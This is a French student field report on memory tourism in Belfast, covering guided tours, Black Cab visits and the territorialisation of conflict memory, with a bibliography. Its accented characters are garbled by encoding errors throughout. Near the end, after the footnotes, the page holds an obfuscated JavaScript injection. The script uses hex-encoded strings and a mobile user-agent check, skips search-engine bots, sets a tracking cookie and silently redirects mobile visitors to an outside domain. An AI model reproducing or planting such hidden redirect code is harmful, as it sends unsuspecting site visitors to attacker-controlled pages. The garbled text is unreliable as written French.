Enfin, la derniA?re expA�rience qui nous oblige contre toute attente A� rA�futer notre deuxiA?me hypothA?se est celle du Loyalist Museum. En ce qui concerne la premiA?re partie nous prA�sentant le musA�e en tant que tel, le guide nous a donnA� beaucoup da��informations de faA�on trA?s unilatA�rale sans nous laisser la possibilitA� de poser des questions pendant la��intervention. Notre participation a donc A�tA� trA?s limitA�e et nous sommes devenues, une fois de plus, spectatrices da��une performance identitaire. Nous avons A�galement eu le mA?me ressenti lors de la seconde partie de la visite. En effet, le guide nous a parlA� en grande partie des forces armA�es protestantes en louant leurs A�A�exploitsA�A� sans chercher A� avoir un rA�el A�change avec le visiteur. La prA�sentation du quartier de East Belfast a A�tA� faite de maniA?re trA?s partiale. Notre capacitA� A� poser des questions A�tait passablement limitA�e et nous avons eu la��impression que nos remarques A� la��encontre de leur point de vue na��A�taient pas les bienvenues, ce qui a rendu la��atmosphA?re assez particuliA?re.

Avec un peu de recul, nous gardons la��impression que ce manque de pA�dagogie ne nous a pas conduit A� une assimilation optimale de la mA�moire. Cependant, ces critiques ne tiennent qua��A� nous, et nos attentes dA�finies au prA�alable ont sans doute biaisA� nos impressions.

b) PA�dagogie et construction de mA�moire

Bien que les arguments allant A� la��encontre de notre deuxiA?me hypothA?se soient nombreux, nous avons tout de mA?me pu assister A� des visites qui nous permettent de la vA�rifier. Nous avons eu la��occasion de visiter le Centre GaA�lique CultA?rlann McAdam A� Fiaich oA? nous avons A�tA� informA�es A� propos de la culture gaA�lique. MalgrA� le fait que la thA�matique des Troubles na��ait pas A�tA� abordA�e, nous avons jugA� pertinent de mentionner cette visite dans le cadre de notre deuxiA?me hypothA?se, car elle montre cette modalitA� pA�dagogique du tourisme. En effet, le but de ce centre est la perpA�tuation de la culture gaA�lique. Pour ce faire, il nous a A�tA� distribuA� A� chacun un petit livret avec les expressions courantes traduites de la��anglais au gaA�lique. Il y a donc eu une rA�elle interaction entre le guide et nous-mA?mes ce qui a rendu la visite plus pA�dagogique, tout en nous immergeant bien dans la problA�matique en question.

Enfin, la visite qui contribue le plus A� la vA�rification de notre deuxiA?me hypothA?se est sans doute le tour en Black Cab. ArrivA�es vers notre taxi, le guide-conducteur sa��est prA�sentA� en nous demandant ce que nous voulions savoir sur Belfast.

Ca��est exactement A� ce genre da��attitude que nous nous attendions dans le cadre da��un tourisme pA�dagogique. En effet, notre guide sa��est assurA� de savoir ce qui nous intA�ressait afin de ne pas sa��attarder sur des A�lA�ments historiques na��ayant qua��une importance secondaire pour nous. Tout au long de notre rencontre, ce dernier a adaptA� son parcours en fonction de nos attentes et nos dA�sirs, crA�ant ainsi un vA�ritable A�change. Ce dernier sa��est A� plusieurs reprises inquiA�tA� de savoir si nous comprenions bien, en nous demandant toujours si nous avions des questions. Lorsqua��il sa��est aperA�u que nous prenions beaucoup de notes sur notre carnet de terrain, il sa��est empressA� de nous proposer de descendre du taxi afin de spatialiser son rA�cit. Bien que sa vision du conflit soit biaisA�e par son positionnement politico-religieux, cela na��A�tait pas gA?nant, car nous sentions bien qua��il A�tait ouvert A� la discussion et A� nos remarques. A plusieurs reprises, nous avons eu la��opportunitA� de lui poser des questions personnelles, il na��a jamais montrA� de mA�contentement A� notre A�gard et sa��est toujours arrangA� pour nous rA�pondre de la meilleure faA�on possible.

Pour conclure, on constate donc que la��offre touristique proposant des circuits pA�dagogiques est mince, mais pas inexistante. Nous sommes conscientes que nous na��avons pas expA�rimentA� toutes les formes de tourisme A� Belfast, mais nous avons tout de mA?me pu remarquer que les visites sont souvent mises en place de maniA?re unilatA�rale en ne cherchant pas da��A�change constructif avec le visiteur. La grande exception est donc celle de la visite avec les Black Cabs qui nous a permis da��avoir une interaction active et constructive avec le guide, A�galement acteur du conflit.

3.2 Tourisme et territorialisation mA�morielle

Afin de voir si les modalitA�s touristiques contribuant A� la perpA�tuation de la mA�moire tendent A� le faire en certains lieux spA�cifiques, nous allons analyser la dimension spatiale de nos expA�riences.

Pour ce qui est de notre City Tour en bus, la mA�moire du conflit tend A� A?tre spatialisA�e dans les quartiers de Falls et de Shankill, mais nous ne sommes passA�es que trA?s rapidement en ces lieux. Certes, la visite de ces quartiers contribue A� la diffusion da��une image A� la��A�tranger par le biais da��une territorialisation de la mA�moire, mais notre passage A�tait trop rapide pour affirmer qua��il existe un rA�el lien entre les souvenirs du conflit et certains lieux. Tel na��a pas A�tA� le cas avec la compagnie de taxi : notre chauffeur nous a conduit plus ou moins dans les mA?mes lieux que le bus, mais da��une toute autre maniA?re. Alors que nous ne faisions que passer devant les murals lors de notre City Tour, nous avions cette fois la��opportunitA� de descendre du taxi et ainsi de pratiquer la��espace. La��effet de territorialisation de la mA�moire dans certaines rues de Falls et Shankill A�tait bien plus fort, car nous avons eu la��opportunitA� de marcher dans les rues tout en A�coutant les expA�riences personnelles de notre chauffeur. Enfin, lors de la visite du quartier de East Belfast, notre guide avait tendance A� spatialiser la mA�moire du conflit en certains lieux emblA�matiques.

Ce dernier sa��est arrA?tA� plusieurs fois dans des mA�moriels protestants et sa��attardait devant certaines fresques emblA�matiques des groupes armA�s loyalistes, ce qui avait pour effet da��ancrer son rA�cit en certains lieux spA�cifiques. Cet effet de territorialisation de la mA�moire est efficace : A� la��avenir, nous associerons les souvenirs A�voquA�s par notre guide A� certains lieux prA�cis, que nous pouvons alors qualifier de lieux de mA�moire

Pour conclure, nous avons vu que la mA�moire tend gA�nA�ralement A� A?tre territorialisA�e dans certaines rues emblA�matiques des quartiers de Shankill et Falls. Aussi, nous constatons que certains lieux ou monuments, tels que les murals les plus cA�lA?bres, les grands mA�moriaux ou de maniA?re gA�nA�rale les quartiers emblA�matiques traversA�s par les peacelines, figurent de maniA?re rA�currente dans les propositions de circuits touristiques. Cela peut A?tre dA� A� leur caractA?re artistique da��une part et politique de la��autre. Cependant, bien que nous puissions dA�celer dans les deux derniA?res visites mentionnA�es un processus de territorialisation de la mA�moire, nous estimons que cela na��est pas suffisant pour vA�rifier cette troisiA?me hypothA?se.

4. Conclusion

Lorsque nous sommes arrivA�es A� Belfast, nous avons dA� faire face A� certaines difficultA�s. En effet, nous avions une idA�e passablement arrA?tA�e sur la forme qua��allait prendre notre travail de terrain. Par exemple, au dA�but de nos recherches, nous A�tions trA?s focalisA�es sur le contenu des discours tenus par les acteurs de la��offre touristique. Or, nous nous sommes vite aperA�ues que dans le cadre de notre travail, le contenu importait moins que la forme et la maniA?re de prA�senter les A�vA�nements passA�s dans le processus de co-construction mA�morielle. Peu A� peu, nous nous en sommes rendues compte et nous avons modifiA� notre maniA?re de rA�colter nos donnA�es afin que ces derniA?res nous apportent de rA�els A�lA�ments de rA�ponses. Nous avons donc cessA� de prendre note des informations factuelles qui nous A�taient transmises et nous nous sommes concentrA�es sur le comportement et la��attitude des acteurs de la��offre touristique.

En conclusion, notre sA�jour A� Belfast nous a effectivement permis de relever deux modalitA�s de la��offre touristique belfastoise qui tendent A� inclure le visiteur A� la production de mA�moire. En effet, nous avons constatA� que certains acteurs mettent bien en place des circuits pA�dagogiques et valorisent les rA�cits personnels dans le but de perpA�tuer la mA�moire du conflit. Bien que ces deux modalitA�s ne soient pas gA�nA�ralisables A� la��entiA?retA� de la��offre touristique belfastoise, nous estimons que nos donnA�es sont suffisantes pour vA�rifier nos deux hypothA?ses relatives A� la mise en scA?ne de rA�cits personnels et de circuits pA�dagogiques dans le cadre da��un tourisme mA�moriel.

Aussi, notre travail de terrain nous a permis de rA�pondre de maniA?re plus ou moins complA?te A� la premiA?re partie de notre question de recherche. Tel ne fut pas le cas pour notre troisiA?me hypothA?se relative A� la territorialisation de la mA�moire dans le cadre du tourisme belfastois. Comme mentionnA� ci-dessus, nous manquons da��informations afin da��affirmer qua��il existe un rA�el processus de territorialisation mA�morielle. Bien que nous soyons restA�es plus da��une semaine A� Belfast, nous na��avons pas eu le temps de rA�colter le matA�riel nA�cessaire afin de mener A� bien une analyse exhaustive de ce processus. Une agence touristique nous a proposA� un walking tour dont il aurait A�tA� intA�ressant de comparer le parcours avec ceux proposA�s par le City Tour et les Black Cabs. Malheureusement, nous nous sommes vues prises par le temps et nous avons dA� renoncer A� cette opportunitA�. Da��autres facteurs nous ont freinA�es dans la��analyse des processus de territorialisation mA�morielle, notamment notre manque da��expA�rience et de connaissances en la matiA?re. Aussi, la littA�rature relative A� ce sujet est passablement lacunaire, bien que certains auteurs aient thA�orisA� le concept de lieu de mA�moire, notamment A-C. Morand (2009), J-D. Urbain (2003), et A. Hertzog (2012). Ces A�lA�ments nous ont empA?chA� de maA�triser rA�ellement cette thA�matique, ce qui a entravA� nos recherches sur le terrain.

Pour aller plus loin, dans le cadre da��une recherche plus globale et reprA�sentative, il serait intA�ressant de multiplier les expA�riences touristiques afin da��avoir une rA�elle vision da��ensemble de ce qui est proposA� A� Belfast. En effet, le programme proposA� par nos enseignantes A�tant assez chargA�, nous avons dA�cidA� de concentrer nos recherches sur les visites prA�vues. Quitte A� diminuer la reprA�sentativitA� de nos rA�sultats ainsi que leur potentielle gA�nA�ralisation, nous avons prA�fA�rA� mener une analyse approfondie da��un nombre restreint de visites et de prospectus. Si nous nous A�tions basA�es sur un trop large panel da��expA�riences touristiques, cela nous aurait conduit A� une analyse plus superficielle du matA�riau collectA�.

Enfin, nous avons conscience que notre analyse a A�tA� passablement non-exhaustive A�tant donnA� le temps qui nous A�tait imparti. Il serait intA�ressant da��analyser en profondeur les logiques de spatialisation de la mA�moire des acteurs de la��offre touristique. En effet, cette thA�matique revA?t da��un grand intA�rA?t de par son caractA?re inA�dit, relativement inexplorA� et intrinsA?quement liA� A� la gA�ographie. Une fois la territorialisation de la mA�moire thA�orisA�e, une voie A� suivre afin da��aller encore plus loin pourrait A?tre da��analyser les buts de la crA�ation des lieux de mA�moire et leurs effets rA�els sur la population locale et A�trangA?re.

5. Bibliographie

CAIN Web Service (2006). Some Frequently Asked Questions a�� The Northern Ireland Conflict [En ligne]. http://cain.ulst.ac.uk/faq/faq2.htm#when (consultA� le 30 mars 2016).

BALLIF Florine (2014). A�A�A�Belfast en temps de paix : la guerre civile comme attraction touristiqueA�. TA�oros [En ligne], Vol. 34, NA�1-2, pp.2-23. https://teoros.revues.org/2761 (ConsultA� le 20 mars 2016).

BALLIF Florine (2012). A�A�Les peacelines de Belfast : le provisoire qui dureA�A�. HermA?s, La Revue [En ligne], Vol.2, NA�63, pp.116-119. https://www.cairn.info/load_pdf.php?ID_ARTICLE=HERM_063_0116 (ConsultA� le 1 fA�vrier 2016).

BROWN Kris, MACGINTY Roger (2003). A�A�Public attitudes toward partisan and neutral symbols in post-agreement Northern IrelandA�A�. IdentitiesA�: Global studies in culture and power [en ligne], Vol.10 NA�1, pp.83-108. http://www.tandfonline.com/doi/abs/10.1080/10702890304337 (ConsultA� le 16 fA�vrier 2016)

CRAHAY FrA�dA�ric (2014). A�A�Tourisme mA�morielA�A�. TA�moigner. Entre histoire et mA�moire. Revue pluridisciplinaire de la Fondation Auschwitz, NA�117, pp. 151-152.

EQUIPE M. I. T. (2000). A�A�La mise en tourisme des lieux: un outil de diagnosticA�A�.A� Mappemonde, Vol. 57, NA�1, pp. 1-6.

HERNANDEZ Julie (2008). A�A�Le tourisme macabre A� La Nouvelle-OrlA�ans aprA?s Katrina : rA�silience et mA�morialisation des espaces affectA�s par des catastrophes majeuresA�A�. Norois [en ligne], Vol.3, NA�208, pp. 61-73. http://norois.revues.org/2208 (ConsultA� le 16 fA�vrier 2016).

HERTZOG Anne (2012). A�A�Tourisme de mA�moire et imaginaire touristique des champs de batailleA�A�. Via, Revue internationale interdisciplinaire de tourisme [En ligne], NA�1, pp.1-16.http://viatourismreview.com/wp-content/uploads/2015/06/Article6.pdf (ConsultA� le 16 fA�vrier 2016).

LEGRAND Caroline (2002). A�A�Du tourisme gA�nA�alogique dans l’Irlande contemporaineA�A�. Revue de SynthA?se, Vol.123, NA�1, pp. 131-147.

LISLE Debbie (2006). A�A�Local symbols, global networks: rereading the murals of BelfastA�A�. Alternatives: Global, Local, Political, Vol. 31, NA�1, pp. 27-52.

MORAND Anne-CA�line (2009). MA�moires de Belfast: Les processus de la mise en tourisme de la mA�moire et leurs expressions spatiales. MA�moire professionnelA�: UniversitA� de Paris 1, PanthA�on Sorbonne, 190p. https://www.univ-paris1.fr/fileadmin/IREST/Memoires_Masters_2/MORAND_Anne-Celine.pdf (ConsultA� le 12 fA�vrier 2016).

NAEF Patrick James (2013). A�A�Tourisme de mA�moire, instrument de paix et/ou de rA�conciliationA�A�. Quand le tourisme questionne la mA�moire [En ligne], pp.70-80. https://archive-ouverte.unige.ch/unige:27745 (ConsultA� le 2 juin 2016).

PETITIER Paule (1989). A�A�Les Lieux de mA�moireA�A�. Romantisme [En ligne], Vol. 19, NA�63, pp. 103-110. www.persee.fr/doc/roman_0048-8593_1989_num_19_63_5570 (ConsultA� le 13 fA�vrier 2016).

URBAIN Jean-Didier (2003). A�A�Tourisme de mA�moire : un travail de deuil positifA�A�. Cahier Espaces, NA�80, pp.5-7.

Photographie A� la une: MA�moriel dans le quartier de East Belfast,A�par Valentina Ferreira GutiA�rrez, mars 2016.

[1] CAIN Web service [en ligne], http://cain.ulst.ac.uk/faq/faq2.htm#when consultA� le 20 mai 2012

[2] UFFA�: Real Ulster Freedom Fighters a�� UDAA�: Ulster Defense Association a�� UYMA�: Ulster Young Militance

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *